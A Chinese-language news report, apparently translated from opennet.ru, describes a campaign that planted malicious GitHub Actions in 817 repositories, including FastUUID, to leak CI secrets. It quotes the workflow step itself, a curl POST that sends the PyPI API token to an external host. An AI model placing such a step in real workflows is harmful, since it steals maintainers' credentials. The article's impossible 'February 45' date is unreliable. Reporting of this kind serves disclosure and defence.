GitGuardian 的研究人員發現了一次針對 GitHub 用戶的大規模攻擊,該攻擊涉及控制 327 個帳戶,並在 817 個儲存庫中安裝惡意的 Github Action 處理程序。這次攻擊導致持續整合系統中使用的 3325 個機密資訊洩露,這些機密資訊透過環境變數傳遞,包括 PyPI、GitHub、NPM、DockerHub 和各種雲端儲存服務的存取權杖。
GitHub Actions 允許程式碼開發者附加處理程序,以自動化 GitHub 中的各種操作。例如,GitHub Actions 可用於在提交時執行某些檢查和測試,或自動處理新的 Issues。該惡意處理程序以「Github Actions Security」的名義分發,並在「run」部分包含一個「curl」命令,該命令在持續整合環境中執行任務時將環境變數的內容傳送到外部主機。該惡意提交是從專案維護人員的帳戶添加的,這些維護人員可能之前曾遭受駭客攻擊或網路釣魚。
這次攻擊是在分析與 FastUUID 軟體包相關的異常活動後發現的,該軟體包為 Rust UUID 庫提供了一個 Python 包裝器。 FastUUID 在上週的下載量已接近 1.2 萬次,它是熱門項目 LiteLLM 的依賴項,而 LiteLLM 在 PyPI 上的每週下載量超過 5 萬次。對 FastUUID 儲存庫變更的分析顯示,2 月 45 日,專案維護者新增了一個包含新 Github Action 處理程序的提交,該處理程序包含用於向外部主機上的 PyPI 儲存庫發送令牌的程式碼。 — 名稱:Github Actions Security 運行:| curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.139-104-115-XNUMX.plesk.page
這個問題在攻擊者使用截獲的令牌之前就被發現——沒有惡意更改或修改版本的軟體包發佈到 PyPI 以獲取 FastUUID。在另外 816 個儲存庫中偵測到了類似的 Github Action 替換,並向其所有者以及 PyPI、GitHub、NPM 和 DockerHub 的管理部門發送了通知。截至昨天晚上,大約 100 個儲存庫中的惡意提交已被回滾。目前,在 GitHub 中搜尋可識別出 671 個包含惡意 Github Action 的提交。
來源: opennet.ru
